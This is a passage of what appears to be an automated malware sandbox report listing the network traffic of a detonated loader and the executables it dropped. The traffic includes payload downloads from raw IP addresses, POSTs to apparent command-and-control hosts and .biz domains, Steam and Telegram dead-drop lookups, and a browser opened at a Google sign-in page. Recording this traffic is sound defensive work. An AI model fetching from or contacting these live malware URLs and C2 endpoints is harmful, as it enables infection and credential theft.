                    11828
                    16465

                    HTTP Request

                    GET http://31.41.244.11/files/6904700471/Z9Pp9pM.exe

                    HTTP Response

                    200

                    HTTP Request

                    GET http://31.41.244.11/files/1521297942/H3tyh96.exe

                    HTTP Response

                    200

                    HTTP Request

                    GET http://31.41.244.11/files/8049824649/yiklfON.exe

                    HTTP Response

                    200

                    HTTP Request

                    GET http://31.41.244.11/files/523681048/3EUEYgl.exe

                    HTTP Response

                    200

                    HTTP Request

                    GET http://31.41.244.11/files/unique2/random.exe

                    HTTP Response

                    200
                  • 185.215.113.206:80
                    http://185.215.113.206/c4becf79229cb002.php
                    http
                    3d69R.exe
                    819 B
                    625 B
                    7
                    5

                    HTTP Request

                    GET http://185.215.113.206/

                    HTTP Response

                    200

                    HTTP Request

                    POST http://185.215.113.206/c4becf79229cb002.php

                    HTTP Response

                    200
                  • 205.209.109.10:4449
                    tls
                    H3tyh96.exe
                    6.4kB
                    4.2kB
                    48
                    44
                  • 172.67.213.48:443
                    https://fightlsoser.click/api
                    tls, http
                    Z9Pp9pM.exe
                    1.0kB
                    4.8kB
                    9
                    9

                    HTTP Request

                    POST https://fightlsoser.click/api

                    HTTP Response

                    200
                  • 172.67.206.64:443
                    https://covery-mover.biz/api
                    tls, http
                    Z9Pp9pM.exe
                    1.1kB
                    4.9kB
                    10
                    11

                    HTTP Request

                    POST https://covery-mover.biz/api

                    HTTP Response

                    200
                  • 23.214.143.155:443
                    https://steamcommunity.com/profiles/76561199724331900
                    tls, http
                    Z9Pp9pM.exe
                    1.6kB
                    43.2kB
                    22
                    37

                    HTTP Request

                    GET https://steamcommunity.com/profiles/76561199724331900

                    HTTP Response

                    200
                  • 149.154.167.99:443
                    https://t.me/detct0r
                    tls, http
                    3EUEYgl.exe
                    1.5kB
                    19.5kB
                    24
                    21

                    HTTP Request

                    GET https://t.me/detct0r

                    HTTP Response

                    200
                  • 116.203.10.31:443
                    https://ooihu.shop/
                    tls, http
                    3EUEYgl.exe
                    1.0kB
                    3.0kB
                    11
                    8

                    HTTP Request

                    GET https://ooihu.shop/

                    HTTP Response

                    200
                  • 116.203.10.31:443
                    https://ooihu.shop/
                    tls, http
                    3EUEYgl.exe
                    1.4kB
                    565 B
                    9
                    6

                    HTTP Request

                    POST https://ooihu.shop/

                    HTTP Response

                    200
                  • 116.203.10.31:443
                    https://ooihu.shop/
                    tls, http
                    3EUEYgl.exe
                    1.5kB
                    598 B
                    9
                    7

                    HTTP Request

                    POST https://ooihu.shop/

                    HTTP Response

                    200
                  • 88.221.135.115:80
                    http://e6.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBTUejiAQejpjQc4fOz2ttjyD6VkMQQUDcXM%2FZvuFAWhTDCCpT5eisNYCdICEgP4k%2Bk5CwN3hyog%2B%2FDYppS8vw%3D%3D
                    http
                    3EUEYgl.exe
                    525 B
                    915 B
                    6
                    4

                    HTTP Request

                    GET http://e6.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBTUejiAQejpjQc4fOz2ttjyD6VkMQQUDcXM%2FZvuFAWhTDCCpT5eisNYCdICEgP4k%2Bk5CwN3hyog%2B%2FDYppS8vw%3D%3D

                    HTTP Response

                    200
                  • 116.203.10.31:443
                    https://ooihu.shop/
                    tls, http
                    3EUEYgl.exe
                    2.6kB
                    634 B
                    11
                    7

                    HTTP Request

                    POST https://ooihu.shop/

                    HTTP Response

                    200
                  • 116.203.10.31:443
                    https://ooihu.shop/
                    tls, http
                    3EUEYgl.exe
                    1.5kB
                    598 B
                    10
                    7

                    HTTP Request

                    POST https://ooihu.shop/

                    HTTP Response

                    200
                  • 116.203.10.31:443
                    https://ooihu.shop/
                    tls, http
                    3EUEYgl.exe
                    1.5kB
                    558 B
                    9
                    6

                    HTTP Request

                    POST https://ooihu.shop/

                    HTTP Response

                    200
                  • 116.203.10.31:443
                    https://ooihu.shop/
                    tls, http
                    3EUEYgl.exe
                    1.8kB
                    518 B
                    9
                    5

                    HTTP Request

                    POST https://ooihu.shop/

                    HTTP Response

                    200
                  • 116.203.10.31:443
                    https://ooihu.shop/
                    tls, http
                    3EUEYgl.exe
                    1.4kB
                    518 B
                    8
                    5

                    HTTP Request

                    POST https://ooihu.shop/

                    HTTP Response

                    200
                  • 185.215.113.16:80
                    http://185.215.113.16/off/random.exe
                    http
                    skotes.exe
                    239.2kB
                    7.5MB
                    4628
                    5383

                    HTTP Request

                    GET http://185.215.113.16/luma/random.exe

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.215.113.16/steam/random.exe

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.215.113.16/well/random.exe

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.215.113.16/off/random.exe

                    HTTP Response

                    200
                  • 80.82.65.70:80
                    http://80.82.65.70/soft/download
                    http
                    f47698ce5b.exe
                    40.0kB
                    1.5MB
                    701
                    1109

                    HTTP Request

                    GET http://80.82.65.70/add?substr=mixtwo&s=three&sub=emp

                    HTTP Response

                    200

                    HTTP Request

                    GET http://80.82.65.70/dll/key

                    HTTP Response

                    200

                    HTTP Request

                    GET http://80.82.65.70/dll/download

                    HTTP Response

                    200

                    HTTP Request

                    GET http://80.82.65.70/files/download

                    HTTP Response

                    200

                    HTTP Request

                    GET http://80.82.65.70/files/download

                    HTTP Response

                    200

                    HTTP Request

                    GET http://80.82.65.70/files/download

                    HTTP Response

                    200

                    HTTP Request

                    GET http://80.82.65.70/files/download

                    HTTP Response

                    200

                    HTTP Request

                    GET http://80.82.65.70/files/download

                    HTTP Response

                    200

                    HTTP Request

                    GET http://80.82.65.70/files/download

                    HTTP Response

                    200

                    HTTP Request

                    GET http://80.82.65.70/files/download

                    HTTP Response

                    200

                    HTTP Request

                    GET http://80.82.65.70/files/download

                    HTTP Response

                    200

                    HTTP Request

                    GET http://80.82.65.70/files/download

                    HTTP Response

                    200

                    HTTP Request

                    GET http://80.82.65.70/files/download

                    HTTP Response

                    200

                    HTTP Request

                    GET http://80.82.65.70/files/download

                    HTTP Response

                    200

                    HTTP Request

                    GET http://80.82.65.70/soft/download

                    HTTP Response

                    200

                    HTTP Request

                    GET http://80.82.65.70/soft/download

                    HTTP Response

                    200
                  • 104.21.96.1:443
                    https://atten-supporse.biz/api
                    tls, http
                    f3745b045c.exe
                    1.0kB
                    4.8kB
                    9
                    9

                    HTTP Request

                    POST https://atten-supporse.biz/api

                    HTTP Response

                    200
                  • 172.67.206.64:443
                    https://covery-mover.biz/api
                    tls, http
                    f3745b045c.exe
                    1.0kB
                    4.8kB
                    9
                    9

                    HTTP Request

                    POST https://covery-mover.biz/api

                    HTTP Response

                    200
                  • 23.214.143.155:443
                    https://steamcommunity.com/profiles/76561199724331900
                    tls, http
                    f3745b045c.exe
                    2.2kB
                    44.3kB
                    31
                    37

                    HTTP Request

                    GET https://steamcommunity.com/profiles/76561199724331900

                    HTTP Response

                    200
                  • 185.215.113.206:80
                    http://185.215.113.206/c4becf79229cb002.php
                    http
                    0858ba6bc7.exe
                    819 B
                    625 B
                    7
                    5

                    HTTP Request

                    GET http://185.215.113.206/

                    HTTP Response

                    200

                    HTTP Request

                    POST http://185.215.113.206/c4becf79229cb002.php

                    HTTP Response

                    200
                  • 34.149.97.1:443
                    https://firefox-api-proxy.cdn.mozilla.net/desktop/v1/recommendations?locale=en-US&region=GB&count=30
                    tls, http2
                    firefox.exe
                    2.9kB
                    12.8kB
                    22
                    22

                    HTTP Request

                    GET https://firefox-api-proxy.cdn.mozilla.net/desktop/v1/recommendations?locale=en-US&region=GB&count=30
                  • 216.58.213.14:443
                    youtube.com
                    firefox.exe
                    52 B
                    1
                  • 216.58.213.14:443
                    youtube.com
                    firefox.exe
                    52 B
                    1
                  • 216.58.213.14:443
                    https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd
                    tls, http2
                    firefox.exe
                    3.0kB
                    10.0kB
                    19
                    20

                    HTTP Request

                    GET https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd

                    HTTP Request

                    GET https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd
                  • 172.217.16.238:443
                    www.youtube.com
                    tls
                    firefox.exe
                    1.1kB
                    6.9kB
                    10
                    8
                  • 142.250.200.46:443
                    https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                    tls, http2
                    firefox.exe
                    2.7kB
                    65.0kB
                    25
                    56

                    HTTP Request

                    GET https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                  • 34.117.121.53:443
                    https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-language-packs/b8aa99dd-b2b6-4312-8c40-d15867393b13.ftl
                    tls, http2
                    firefox.exe
                    1.8kB
                    21.3kB
                    21
                    28

                    HTTP Request

                    GET https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-language-packs/b8aa99dd-b2b6-4312-8c40-d15867393b13.ftl
                  • 142.250.187.196:443
                    https://www.google.com/favicon.ico
                    tls, http2
                    firefox.exe
                    2.0kB
                    7.4kB
                    15
                    15

                    HTTP Request

                    GET https://www.google.com/favicon.ico
                  • 127.0.0.1:63593
                    firefox.exe
                  • 127.0.0.1:63601
                    firefox.exe
                  • 142.250.187.196:443
                    www.google.com
                    firefox.exe
                    52 B
                    1
                  • 88.221.134.155:80
                    http://ciscobinary.openh264.org/openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip
                    http
                    firefox.exe
                    18.8kB
                    506.3kB
                    303
                    366

                    HTTP Request

                    GET http://ciscobinary.openh264.org/openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip

                    HTTP Response

                    200
                  • 142.250.187.206:443
                    https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip
                    tls, http2
                    firefox.exe
                    1.8kB
                    8.9kB
                    21
                    20

                    HTTP Request

                    GET https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip
                  • 74.125.175.169:443
                    https://r4---sn-aigzrnsz.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip?cms_redirect=yes&met=1733860183,&mh=R8&mip=181.215.176.83&mm=28&mn=sn-aigzrnsz&ms=nvh&mt=1733859861&mv=m&mvi=4&pl=27&rmhost=r1---sn-aigzrnsz.gvt1.com&rms=nvh,nvh&shardbypass=sd&smhost=r2---sn-aigzrn7s.gvt1.com
                    tls, http
                    firefox.exe
                    209.0kB
                    5.9MB
                    3311
                    4265

                    HTTP Request

                    GET https://r4---sn-aigzrnsz.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip?cms_redirect=yes&met=1733860183,&mh=R8&mip=181.215.176.83&mm=28&mn=sn-aigzrnsz&ms=nvh&mt=1733859861&mv=m&mvi=4&pl=27&rmhost=r1---sn-aigzrnsz.gvt1.com&rms=nvh,nvh&shardbypass=sd&smhost=r2---sn-aigzrn7s.gvt1.com

                    HTTP Response

                    200
                  • 8.8.8.8:53
                    8.8.8.8.in-addr.arpa
                    dns
                    66 B
                    90 B
                    1
                    1

                    DNS Request

                    8.8.8.8.in-addr.arpa

                  • 8.8.8.8:53
                    58.55.71.13.in-addr.arpa
                    dns
                    70 B
                    144 B
                    1
                    1

                    DNS Request

                    58.55.71.13.in-addr.arpa

                  • 8.8.8.8:53
                    90.210.23.2.in-addr.arpa
                    dns
                    70 B
                    133 B
                    1
                    1

                    DNS Request

                    90.210.23.2.in-addr.arpa

                  • 8.8.8.8:53
                    atten-supporse.biz
                    dns
                    f3745b045c.exe
                    64 B
                    176 B
                    1
                    1

                    DNS Request

                    atten-supporse.biz

                    DNS Response

                    104.21.96.1
                    104.21.16.1
                    104.21.64.1
                    104.21.112.1
                    104.21.48.1
                    104.21.80.1
                    104.21.32.1

                  • 8.8.8.8:53
                    138.32.126.40.in-addr.arpa
                    dns
                    72 B
                    158 B
                    1
                    1

                    DNS Request

                    138.32.126.40.in-addr.arpa

                  • 8.8.8.8:53
                    95.221.229.192.in-addr.arpa
                    dns
                    73 B
                    144 B
                    1
                    1

                    DNS Request

                    95.221.229.192.in-addr.arpa

                  • 8.8.8.8:53
                    1.96.21.104.in-addr.arpa
                    dns
                    70 B
                    132 B
                    1
                    1

                    DNS Request

                    1.96.21.104.in-addr.arpa

                  • 8.8.8.8:53
                    se-blurry.biz
                    dns
                    f3745b045c.exe
                    59 B
                    121 B
                    1
                    1

                    DNS Request

                    se-blurry.biz

                  • 8.8.8.8:53
                    zinc-sneark.biz
                    dns
                    f3745b045c.exe
                    61 B
                    123 B
                    1
                    1

                    DNS Request

                    zinc-sneark.biz

                  • 8.8.8.8:53
                    dwell-exclaim.biz
                    dns
                    f3745b045c.exe
                    63 B
                    125 B
                    1
                    1

                    DNS Request

                    dwell-exclaim.biz

                  • 8.8.8.8:53
                    formy-spill.biz
                    dns
                    f3745b045c.exe
                    61 B
                    123 B
                    1
                    1

                    DNS Request

                    formy-spill.biz

                  • 8.8.8.8:53
                    covery-mover.biz
                    dns
                    f3745b045c.exe
                    62 B
                    94 B
                    1
                    1

                    DNS Request

                    covery-mover.biz

                    DNS Response

                    172.67.206.64
                    104.21.58.186

                  • 8.8.8.8:53
                    dare-curbys.biz
                    dns
                    f3745b045c.exe
                    61 B
                    123 B
                    1
                    1

                    DNS Request

                    dare-curbys.biz

                  • 8.8.8.8:53
                    print-vexer.biz
                    dns
                    f3745b045c.exe
                    61 B
                    123 B
                    1
                    1

                    DNS Request

                    print-vexer.biz

                  • 8.8.8.8:53
                    impend-differ.biz
                    dns
                    f3745b045c.exe
                    63 B
                    125 B
                    1
                    1

                    DNS Request

                    impend-differ.biz

                  • 8.8.8.8:53
                    steamcommunity.com
                    dns
                    f3745b045c.exe
                    64 B
                    80 B
                    1
                    1

                    DNS Request

                    steamcommunity.com

                    DNS Response

                    23.214.143.155

                  • 8.8.8.8:53
                    64.206.67.172.in-addr.arpa
                    dns
                    72 B
                    134 B
                    1
                    1

                    DNS Request

                    64.206.67.172.in-addr.arpa

                  • 8.8.8.8:53
                    43.113.215.185.in-addr.arpa
                    dns
                    73 B
                    133 B
                    1
                    1

                    DNS Request

                    43.113.215.185.in-addr.arpa

                  • 224.0.0.251:5353
                    690 B
                    10
                  • 8.8.8.8:53
                    155.143.214.23.in-addr.arpa
                    dns
                    73 B
                    139 B
                    1
                    1

                    DNS Request

                    155.143.214.23.in-addr.arpa

                  • 8.8.8.8:53
                    11.244.41.31.in-addr.arpa
                    dns
                    71 B
                    131 B
                    1
                    1

                    DNS Request

                    11.244.41.31.in-addr.arpa

                  • 8.8.8.8:53
                    206.113.215.185.in-addr.arpa
                    dns
                    74 B
                    134 B
                    1
                    1

                    DNS Request

                    206.113.215.185.in-addr.arpa

                  • 8.8.8.8:53
                    232.168.11.51.in-addr.arpa
                    dns
                    72 B
                    158 B
                    1
                    1

                    DNS Request

                    232.168.11.51.in-addr.arpa

                  • 8.8.8.8:53
                    97.17.167.52.in-addr.arpa
                    dns
                    71 B
                    145 B
                    1
                    1

                    DNS Request

                    97.17.167.52.in-addr.arpa

                  • 8.8.8.8:53
                    197.87.175.4.in-addr.arpa
                    dns
                    71 B
                    157 B
                    1
                    1

                    DNS Request

                    197.87.175.4.in-addr.arpa

                  • 8.8.8.8:53
                    10.109.209.205.in-addr.arpa
                    dns
                    73 B
                    134 B
                    1
                    1

                    DNS Request

                    10.109.209.205.in-addr.arpa

                  • 8.8.8.8:53
                    18.31.95.13.in-addr.arpa
                    dns
                    70 B
                    144 B
                    1
                    1

                    DNS Request

                    18.31.95.13.in-addr.arpa

                  • 8.8.8.8:53
                    134.130.81.91.in-addr.arpa
                    dns
                    72 B
                    147 B
                    1
                    1

                    DNS Request

                    134.130.81.91.in-addr.arpa

                  • 8.8.8.8:53
                    89.210.23.2.in-addr.arpa
                    dns
                    70 B
                    133 B
                    1
                    1

                    DNS Request

                    89.210.23.2.in-addr.arpa

                  • 8.8.8.8:53
                    fightlsoser.click
                    dns
                    Z9Pp9pM.exe
                    63 B
                    95 B
                    1
                    1

                    DNS Request

                    fightlsoser.click

                    DNS Response

                    172.67.213.48
                    104.21.35.43

                  • 8.8.8.8:53
                    se-blurry.biz
                    dns
                    f3745b045c.exe
                    118 B
                    121 B
                    2
                    1

                    DNS Request

                    se-blurry.biz

                    DNS Request

                    se-blurry.biz

                  • 8.8.8.8:53
                    48.213.67.172.in-addr.arpa
                    dns
                    72 B
                    134 B
                    1
                    1

                    DNS Request

                    48.213.67.172.in-addr.arpa

                  • 8.8.8.8:53
                    zinc-sneark.biz
                    dns
                    f3745b045c.exe
                    61 B
                    123 B
                    1
                    1

                    DNS Request

                    zinc-sneark.biz

                  • 8.8.8.8:53
                    dwell-exclaim.biz
                    dns
                    f3745b045c.exe
                    63 B
                    125 B
                    1
                    1

                    DNS Request

                    dwell-exclaim.biz

                  • 8.8.8.8:53
                    formy-spill.biz
                    dns
                    f3745b045c.exe
                    61 B
                    123 B
                    1
                    1

                    DNS Request

                    formy-spill.biz

                  • 8.8.8.8:53
                    dare-curbys.biz
                    dns
                    f3745b045c.exe
                    61 B
                    123 B
                    1
                    1

                    DNS Request

                    dare-curbys.biz

                  • 8.8.8.8:53
                    print-vexer.biz
                    dns
                    f3745b045c.exe
                    61 B
                    123 B
                    1
                    1

                    DNS Request

                    print-vexer.biz

                  • 8.8.8.8:53
                    impend-differ.biz
                    dns
                    f3745b045c.exe
                    63 B
                    125 B
                    1
                    1

                    DNS Request

                    impend-differ.biz

                  • 8.8.8.8:53
                    steamcommunity.com
                    dns
                    f3745b045c.exe
                    64 B
                    80 B
                    1
                    1

                    DNS Request

                    steamcommunity.com

                    DNS Response

                    23.214.143.155

                  • 8.8.8.8:53
                    78.210.23.2.in-addr.arpa
                    dns
                    70 B
                    133 B
                    1
                    1

                    DNS Request

                    78.210.23.2.in-addr.arpa

                  • 8.8.8.8:53
                    t.me
                    dns
                    3EUEYgl.exe
                    50 B
                    66 B
                    1
                    1

                    DNS Request

                    t.me

                    DNS Response

                    149.154.167.99

                  • 8.8.8.8:53
                    ooihu.shop
                    dns
                    3EUEYgl.exe
                    112 B
                    144 B
                    2
                    2

                    DNS Request

                    ooihu.shop

                    DNS Response

                    116.203.10.31

                    DNS Request

                    ooihu.shop

                    DNS Response

                    116.203.10.31

                  • 8.8.8.8:53
                    99.167.154.149.in-addr.arpa
                    dns
                    73 B
                    166 B
                    1
                    1

                    DNS Request

                    99.167.154.149.in-addr.arpa

                  • 8.8.8.8:53
                    70.209.201.84.in-addr.arpa
                    dns
                    72 B
                    132 B
                    1
                    1

                    DNS Request

                    70.209.201.84.in-addr.arpa

                  • 8.8.8.8:53
                    31.10.203.116.in-addr.arpa
                    dns
                    72 B
                    129 B
                    1
                    1

                    DNS Request

                    31.10.203.116.in-addr.arpa

                  • 8.8.8.8:53
                    e6.o.lencr.org
                    dns
                    3EUEYgl.exe
                    120 B
                    446 B
                    2
                    2

                    DNS Request

                    e6.o.lencr.org

                    DNS Request

                    e6.o.lencr.org

                    DNS Response

                    88.221.135.115
                    88.221.135.106
                    88.221.134.115
                    88.221.135.113
                    88.221.135.97
                    88.221.135.114

                    DNS Response

                    88.221.135.115
                    88.221.135.97
                    88.221.135.106
                    88.221.135.114
                    88.221.134.115
                    88.221.135.113

                  • 8.8.8.8:53
                    21.236.111.52.in-addr.arpa
                    dns
                    72 B
                    158 B
                    1
                    1

                    DNS Request

                    21.236.111.52.in-addr.arpa

                  • 8.8.8.8:53
                    61.45.26.184.in-addr.arpa
                    dns
                    71 B
                    135 B
                    1
                    1

                    DNS Request

                    61.45.26.184.in-addr.arpa

                  • 8.8.8.8:53
                    115.135.221.88.in-addr.arpa
                    dns
                    73 B
                    139 B
                    1
                    1

                    DNS Request

                    115.135.221.88.in-addr.arpa

                  • 8.8.8.8:53
                    16.113.215.185.in-addr.arpa
                    dns
                    73 B
                    133 B
                    1
                    1

                    DNS Request

                    16.113.215.185.in-addr.arpa

                  • 8.8.8.8:53
                    70.65.82.80.in-addr.arpa
                    dns
                    140 B
                    214 B
                    2
                    2

                    DNS Request

                    70.65.82.80.in-addr.arpa

                    DNS Request

                    70.65.82.80.in-addr.arpa

                  • 8.8.8.8:53
                    se-blurry.biz
                    dns
                    f3745b045c.exe
                    118 B
                    242 B
                    2
                    2

                    DNS Request

                    se-blurry.biz

                    DNS Request

                    se-blurry.biz

                  • 8.8.8.8:53
                    zinc-sneark.biz
                    dns
                    f3745b045c.exe
                    61 B
                    123 B
                    1
                    1

                    DNS Request

                    zinc-sneark.biz

                  • 8.8.8.8:53
                    dwell-exclaim.biz
                    dns
                    f3745b045c.exe
                    126 B
                    250 B
                    2
                    2

                    DNS Request

                    dwell-exclaim.biz

                    DNS Request

                    dwell-exclaim.biz

                  • 8.8.8.8:53
                    formy-spill.biz
                    dns
                    f3745b045c.exe
                    61 B
                    123 B
                    1
                    1

                    DNS Request

                    formy-spill.biz

                  • 8.8.8.8:53
                    dare-curbys.biz
                    dns
                    f3745b045c.exe
                    61 B
                    123 B
                    1
                    1

                    DNS Request

                    dare-curbys.biz

                  • 8.8.8.8:53
                    print-vexer.biz
                    dns
                    f3745b045c.exe
                    61 B
                    123 B
                    1
                    1

                    DNS Request

                    print-vexer.biz

                  • 8.8.8.8:53
                    impend-differ.biz
                    dns
                    f3745b045c.exe
                    63 B
                    125 B
                    1
                    1

                    DNS Request

                    impend-differ.biz

                  • 8.8.8.8:53
                    steamcommunity.com
                    dns
                    f3745b045c.exe
                    128 B
                    160 B
                    2
                    2

                    DNS Request

                    steamcommunity.com

                    DNS Request

                    steamcommunity.com

                    DNS Response

                    23.214.143.155

                    DNS Response

                    23.214.143.155

                  • 8.8.8.8:53
                    youtube.com
                    dns
                    firefox.exe
                    114 B
                    146 B
                    2
                    2

                    DNS Request

                    youtube.com

                    DNS Response

                    216.58.213.14

                    DNS Request

                    youtube.com

                    DNS Response

                    216.58.213.14

                  • 8.8.8.8:53
                    spocs.getpocket.com
                    dns
                    firefox.exe
                    65 B
                    131 B
                    1
                    1

                    DNS Request

                    spocs.getpocket.com

                    DNS Response

                    34.117.188.166

                  • 8.8.8.8:53
                    firefox-api-proxy.cdn.mozilla.net
                    dns
                    firefox.exe
                    79 B
                    160 B
                    1
                    1

                    DNS Request

                    firefox-api-proxy.cdn.mozilla.net

                    DNS Response

                    34.149.97.1

                  • 8.8.8.8:53
                    prod.remote-settings.prod.webservices.mozgcp.net
                    dns
                    firefox.exe
                    188 B
                    110 B
                    2
                    1

                    DNS Request

                    prod.remote-settings.prod.webservices.mozgcp.net

                    DNS Request

                    prod.remote-settings.prod.webservices.mozgcp.net

                    DNS Response

                    34.149.100.209

                  • 8.8.8.8:53
                    firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                    dns
                    firefox.exe
                    200 B
                    116 B
                    2
                    1

                    DNS Request

                    firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

                    DNS Request

                    firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

                    DNS Response

                    34.149.97.1

                  • 8.8.8.8:53
                    shavar.prod.mozaws.net
                    dns
                    firefox.exe
                    136 B
                    232 B
                    2
                    2

                    DNS Request

                    shavar.prod.mozaws.net

                    DNS Response

                    44.228.225.150
                    35.85.93.176
                    54.213.181.160

                    DNS Request

                    shavar.prod.mozaws.net

                    DNS Response

                    54.213.181.160
                    35.85.93.176
                    44.228.225.150

                  • 8.8.8.8:53
                    prod.content-signature-chains.prod.webservices.mozgcp.net
                    dns
                    firefox.exe
                    206 B
                    238 B
                    2
                    2

                    DNS Request

                    prod.content-signature-chains.prod.webservices.mozgcp.net

                    DNS Response

                    34.160.144.191

                    DNS Request

                    prod.content-signature-chains.prod.webservices.mozgcp.net

                    DNS Response

                    34.160.144.191

                  • 8.8.8.8:53
                    prod.ads.prod.webservices.mozgcp.net
                    dns
                    firefox.exe
                    164 B
                    196 B
                    2
                    2

                    DNS Request

                    prod.ads.prod.webservices.mozgcp.net

                    DNS Response

                    34.117.188.166

                    DNS Request

                    prod.ads.prod.webservices.mozgcp.net

                    DNS Response

                    34.117.188.166

                  • 8.8.8.8:53
                    youtube.com
                    dns
                    firefox.exe
                    57 B
                    73 B
                    1
                    1

                    DNS Request

                    youtube.com

                    DNS Response

                    216.58.213.14

                  • 8.8.8.8:53
                    firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                    dns
                    firefox.exe
                    100 B
                    128 B
                    1
                    1

                    DNS Request

                    firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

                    DNS Response

                    2600:1901:0:74e4::

                  • 8.8.8.8:53
                    prod.remote-settings.prod.webservices.mozgcp.net
                    dns
                    firefox.exe
                    188 B
                    374 B
                    2
                    2

                    DNS Request

                    prod.remote-settings.prod.webservices.mozgcp.net

                    DNS Request

                    prod.remote-settings.prod.webservices.mozgcp.net

                  • 8.8.8.8:53
                    youtube.com
                    dns
                    firefox.exe
                    57 B
                    85 B
                    1
                    1

                    DNS Request

                    youtube.com

                    DNS Response

                    2a00:1450:4009:816::200e

                  • 8.8.8.8:53
                    shavar.prod.mozaws.net
                    dns
                    firefox.exe
                    68 B
                    153 B
                    1
                    1

                    DNS Request

                    shavar.prod.mozaws.net

                  • 8.8.8.8:53
                    prod.content-signature-chains.prod.webservices.mozgcp.net
                    dns
                    firefox.exe
                    103 B
                    131 B
                    1
                    1

                    DNS Request

                    prod.content-signature-chains.prod.webservices.mozgcp.net

                    DNS Response

                    2600:1901:0:92a9::

                  • 8.8.8.8:53
                    prod.ads.prod.webservices.mozgcp.net
                    dns
                    firefox.exe
                    82 B
                    175 B
                    1
                    1

                    DNS Request

                    prod.ads.prod.webservices.mozgcp.net

                  • 8.8.8.8:53
                    14.213.58.216.in-addr.arpa
                    dns
                    72 B
                    141 B
                    1
                    1

                    DNS Request

                    14.213.58.216.in-addr.arpa

                  • 34.149.97.1:443
                    firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                    https
                    firefox.exe
                    1.8kB
                    4.3kB
                    6
                    6
                  • 216.58.213.14:443
                    youtube.com
                    https
                    firefox.exe
                    1.9kB
                    9.3kB
                    8
                    10
                  • 8.8.8.8:53
                    www.youtube.com
                    dns
                    firefox.exe
                    122 B
                    670 B
                    2
                    2

                    DNS Request

                    www.youtube.com

                    DNS Request

                    www.youtube.com

                    DNS Response

                    172.217.16.238
                    216.58.204.78
                    142.250.200.46
                    172.217.169.46
                    142.250.179.238
                    142.250.200.14
                    216.58.212.206
                    142.250.187.206
                    142.250.180.14
                    216.58.201.110
                    142.250.178.14
                    216.58.213.14
                    216.58.212.238
                    142.250.187.238
                    172.217.169.14

                    DNS Response

                    172.217.169.14
                    142.250.178.14
                    142.250.187.206
                    216.58.204.78
                    216.58.213.14
                    216.58.212.238
                    142.250.180.14
                    142.250.200.14
                    172.217.169.46
                    142.250.179.238
                    172.217.16.238
                    216.58.201.110
                    142.250.187.238
                    142.250.200.46
                    216.58.212.206

                  • 8.8.8.8:53
                    youtube-ui.l.google.com
                    dns
                    firefox.exe
                    69 B
                    309 B
                    1
                    1

                    DNS Request

                    youtube-ui.l.google.com

                    DNS Response

                    142.250.187.206
                    142.250.187.238
                    216.58.204.78
                    172.217.169.46
                    142.250.200.46
                    142.250.180.14
                    172.217.169.14
                    142.250.178.14
                    142.250.200.14
                    172.217.16.238
                    216.58.201.110
                    142.250.179.238
                    216.58.212.206
                    216.58.212.238
                    216.58.213.14

                  • 8.8.8.8:53
                    youtube-ui.l.google.com
                    dns
                    firefox.exe
                    69 B
                    181 B
                    1
                    1

                    DNS Request

                    youtube-ui.l.google.com

                    DNS Response

                    2a00:1450:4009:826::200e
                    2a00:1450:4009:822::200e
                    2a00:1450:4009:823::200e
                    2a00:1450:4009:827::200e

                  • 172.217.16.238:443
                    youtube-ui.l.google.com
                    https
                    firefox.exe
                    4.1kB
                    10.4kB
                    10
                    15
                  • 8.8.8.8:53
                    consent.youtube.com
                    dns
                    firefox.exe
                    65 B
                    81 B
                    1
                    1

                    DNS Request

                    consent.youtube.com

                    DNS Response

                    142.250.200.46

                  • 8.8.8.8:53
                    consent.youtube.com
                    dns
                    firefox.exe
                    65 B
                    81 B
                    1
                    1

                    DNS Request

                    consent.youtube.com

                    DNS Response

                    142.250.200.46

                  • 8.8.8.8:53
                    firefox-settings-attachments.cdn.mozilla.net
                    dns
                    firefox.exe
                    90 B
                    177 B
                    1
                    1

                    DNS Request

                    firefox-settings-attachments.cdn.mozilla.net

                    DNS Response

                    34.117.121.53

                  • 8.8.8.8:53
                    consent.youtube.com
                    dns
                    firefox.exe
                    65 B
                    93 B
                    1
                    1

                    DNS Request

                    consent.youtube.com

                    DNS Response

                    2a00:1450:4009:823::200e

                  • 8.8.8.8:53
                    attachments.prod.remote-settings.prod.webservices.mozgcp.net
                    dns
                    firefox.exe
                    106 B
                    122 B
                    1
                    1

                    DNS Request

                    attachments.prod.remote-settings.prod.webservices.mozgcp.net

                    DNS Response

                    34.117.121.53

                  • 8.8.8.8:53
                    attachments.prod.remote-settings.prod.webservices.mozgcp.net
                    dns
                    firefox.exe
                    212 B
                    199 B
                    2
                    1

                    DNS Request

